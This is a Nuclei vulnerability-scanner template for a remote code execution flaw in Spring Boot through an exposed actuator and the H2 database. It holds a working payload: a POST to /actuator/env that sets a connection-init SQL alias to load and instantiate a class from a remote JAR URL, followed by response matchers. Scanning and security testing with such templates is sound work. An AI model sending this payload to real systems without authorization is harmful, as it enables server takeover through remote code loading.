nuclei-templates/vulnerabilities/springboot/springboot-h2-db-rce.yaml

41 lines
1.3 KiB
YAML

id: springboot-h2-db-rce
info:
name: Spring Boot H2 Database RCE
author: dwisiswant0
severity: critical
tags: springboot,rce
# Payload taken from @pyn3rd (Twitter), see reference[2].
# References:
# - [1] https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
# - [2] https://twitter.com/pyn3rd/status/1305151887964946432
# - [3] https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
# - [4] https://github.com/spaceraccoon/spring-boot-actuator-h2-rce
requests:
- method: POST
path:
- "{{BaseURL}}/actuator/env"
headers:
Content-Type: "application/json"
body: |
{
"name": "spring.datasource.hikari.connection-init-sql",
"value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"spring.datasource.hikari.connection-init-sql\":\""
condition: and
part: body
- type: word
words:
- "application/vnd.spring-boot.actuator"
part: header